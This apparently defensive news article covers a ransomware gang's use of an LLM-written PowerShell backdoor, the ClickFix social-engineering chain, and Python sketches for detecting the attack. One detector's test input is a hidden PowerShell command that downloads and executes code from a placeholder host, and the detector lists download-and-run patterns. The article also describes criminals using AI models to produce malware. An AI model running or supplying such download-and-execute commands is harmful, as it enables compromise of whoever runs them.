Mar 14, 2026 · 5 min read
This Ransomware Gang Is Using ChatGPT to Write Its Malware
Security researchers have identified a ransomware group called Hive0163 deploying AI-generated malware to maintain persistent access inside corporate networks, marking a new phase in how criminal gangs weaponize large language models.
AI Wrote the Backdoor
The malware is called Slopoly, and researchers say it was almost certainly written by a large language model. The telltale signs are unmistakable: extensive code comments explaining every function, comprehensive error handling, properly named variables, and structured logging. These are the habits of AI-generated code, not the kind of thing human malware authors typically bother with when writing tools meant to be used once and discarded.
Slopoly is a PowerShell-based backdoor that establishes persistent access on compromised Windows servers. Once installed, it creates a scheduled task disguised as "Runtime Broker," a legitimate Windows process, making it difficult for system administrators to spot during routine checks. The tool sends system information heartbeats to its command-and-control server every 30 seconds and polls for new instructions every 50 seconds, giving the attackers near-real-time control of infected machines.
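Defenders can hunt for this persistence trick by comparing scheduled-task names against trusted Windows process names and flagging any match that launches a script interpreter. A minimal sketch of that heuristic in Python, with hypothetical task data (in practice the list would come from the Task Scheduler API or `schtasks /query`):

```python
# Flag scheduled tasks that borrow a legitimate Windows process name
# but whose action launches a script host -- the pattern Slopoly uses.
# The task data below is hypothetical sample input, not real telemetry.

LEGIT_NAMES = {"runtime broker", "windows update", "defender scan"}
INTERPRETERS = ("powershell", "pwsh", "wscript", "cscript", "mshta")

def suspicious_tasks(tasks):
    """Return names of tasks using a trusted name to run a script host."""
    hits = []
    for task in tasks:
        name = task["name"].strip().lower()
        action = task["action"].lower()
        borrows_name = name in LEGIT_NAMES
        runs_interpreter = any(i in action for i in INTERPRETERS)
        if borrows_name and runs_interpreter:
            hits.append(task["name"])
    return hits

tasks = [
    {"name": "Runtime Broker", "action": r"powershell.exe -w hidden script.ps1"},
    {"name": "OneDrive Sync", "action": r"C:\Program Files\OneDrive\sync.exe"},
]
print(suspicious_tasks(tasks))  # -> ['Runtime Broker']
```

A real "Runtime Broker" runs as an executable from a system path, never via PowerShell, which is what makes this simple name-plus-action check effective.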
How the Attack Chain Works
Hive0163 does not start with Slopoly. The group uses a technique called ClickFix to gain initial access, tricking employees into executing PowerShell commands that download a first-stage payload called NodeSnake. This initial malware establishes a foothold and retrieves the broader Interlock RAT framework, which then deploys Slopoly during later stages of the attack to maintain extended network access.
The ClickFix technique works by presenting victims with a fake error message or verification prompt, often disguised as a CAPTCHA or browser update. When users follow the instructions to "fix" the problem, they unknowingly execute the malicious PowerShell command. The social engineering is effective precisely because it exploits a natural instinct: when something appears broken, people want to fix it.
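ClickFix payloads tend to share a recognizable shape: the pasted command hides its window, bypasses execution policy, and downloads and runs a second stage in memory. A hedged sketch of a scoring heuristic built on those markers (the pattern list is illustrative, not exhaustive, and the sample commands are invented):

```python
# Heuristic flagging of ClickFix-style pasted commands. The marker
# regexes below cover common download-and-run tells; a production rule
# set would be broader and tuned against real telemetry.
import re

MARKERS = [
    r"-w(indowstyle)?\s+hidden",         # hide the console window
    r"-e(p|xecutionpolicy)?\s+bypass",   # skip script policy checks
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
    r"invoke-expression|\biex\b",        # execute fetched text in memory
]

def looks_like_clickfix(command: str) -> bool:
    """True if the command matches two or more download-and-run markers."""
    text = command.lower()
    hits = sum(1 for pattern in MARKERS if re.search(pattern, text))
    return hits >= 2

print(looks_like_clickfix(
    'powershell -w hidden -ep bypass -c "iex (iwr https://example.test/a)"'
))  # -> True
print(looks_like_clickfix("Get-ChildItem -Recurse"))  # -> False
```

Requiring two or more markers keeps a single benign flag (an admin legitimately hiding a window, say) from triggering an alert on its own.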
Once inside the network, Hive0163 typically spends more than a week conducting reconnaissance before deploying ransomware. During this period, the group exfiltrates sensitive data, maps the network infrastructure, and identifies high-value targets. The final phase involves encrypting systems and threatening to publish the stolen data unless a ransom is paid.
The AI Advantage for Criminals
What makes the Slopoly case significant is not that the malware is particularly sophisticated. In fact, researchers noted that it is relatively unsophisticated: despite calling itself a "Polymorphic C2 Persistence Client," it cannot actually modify its own code during execution. The real significance is what it represents about the changing economics of cybercrime.
Previously, writing functional malware required meaningful programming expertise. Ransomware gangs either needed skilled developers on their teams or had to purchase tools from underground markets. AI-generated malware lowers that barrier dramatically. A criminal with basic technical knowledge can now prompt a large language model to generate a working backdoor, complete with persistence mechanisms and command-and-control capabilities, in minutes rather than days.
Slopoly's builder can also generate new variants by randomizing configuration values and function names, making each deployment slightly different. While this is not true polymorphism, it is enough to evade signature-based detection tools that rely on matching known patterns. The combination of AI generation and automated variation creates a volume problem for defenders: more unique samples to analyze, with less human effort required from the attackers.
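The reason this defeats hash- or signature-based matching is easy to demonstrate: two variants that behave identically still hash to completely different values once even one identifier changes. A small sketch using a harmless stand-in template (not actual malware code, and not Slopoly's real builder logic):

```python
# Why identifier randomization defeats signature matching: variants with
# identical behavior produce unrelated hashes. The template is a benign
# stand-in illustrating the principle, not real builder output.
import hashlib
import random
import string

TEMPLATE = "function {fn}() {{ $interval = {secs}; Send-Heartbeat $interval }}"

def make_variant(rng: random.Random) -> str:
    """Fill the template with a random function name and interval."""
    name = "".join(rng.choices(string.ascii_letters, k=8))
    return TEMPLATE.format(fn=name, secs=rng.randint(20, 60))

rng = random.Random(1)
a, b = make_variant(rng), make_variant(rng)
print(hashlib.sha256(a.encode()).hexdigest())
print(hashlib.sha256(b.encode()).hexdigest())
# The two digests share nothing, so a signature keyed to one variant's
# hash misses the next -- even though the behavior is unchanged.
```

This is why the article's later recommendation to favor behavioral detection over pure signature matching matters: the behavior (the beacon interval, the persistence mechanism) is far harder to randomize away than the file hash.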
A Growing Trend in 2026
IBM's 2026 X-Force Threat Index reported a 44% increase in attacks on public-facing applications, with AI tools helping attackers identify weaknesses faster. The report also found that AI-generated phishing attacks surged fourteenfold during the end-of-year holiday period, showing that criminals are applying language models across the entire attack lifecycle, from initial social engineering to persistent malware deployment.
Hive0163 is not the first group to use AI-generated tools, but the explicit use of LLM output as production malware rather than just a drafting aid marks an escalation. Security teams can no longer assume that sloppy code means a low-skilled attacker or that well-documented code means a legitimate tool. The signals that analysts have traditionally used to assess threat sophistication are becoming unreliable.
How to Protect Yourself
- Be suspicious of any prompt asking you to copy and paste commands into a terminal or run PowerShell scripts
- Enable PowerShell constrained language mode on workstations to limit script execution capabilities
- Monitor for unexpected scheduled tasks, especially those mimicking legitimate Windows process names like Runtime Broker
- Implement network segmentation to limit lateral movement if an attacker gains initial access
- Deploy endpoint detection and response tools that analyze behavior rather than relying solely on signature matching
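The last recommendation can be made concrete: beaconing malware like Slopoly calls home at near-constant intervals, so connections to a single destination with very low gap variance are a behavioral red flag regardless of what the binary looks like. A minimal sketch of that check, with illustrative thresholds and invented sample timestamps:

```python
# Behavioral beacon detection sketch: Slopoly heartbeats every 30 seconds,
# so inter-arrival gaps to its C2 server are nearly constant. Thresholds
# and sample data here are illustrative, not tuned production values.
from statistics import pstdev

def looks_like_beacon(timestamps, max_jitter=2.0, min_events=5):
    """True if connection gaps are numerous and nearly constant."""
    if len(timestamps) < min_events:
        return False
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return pstdev(gaps) <= max_jitter

# A 30-second heartbeat with slight network jitter:
heartbeat = [0, 30.2, 60.1, 90.4, 120.0, 150.3]
# Ordinary browsing to the same host: irregular gaps.
browsing = [0, 4, 95, 110, 400, 401]

print(looks_like_beacon(heartbeat))  # -> True
print(looks_like_beacon(browsing))   # -> False
```

Real EDR products use richer models than a standard deviation cutoff, but the underlying idea is the same: randomized names and hashes change with every variant, while the 30-second heartbeat does not.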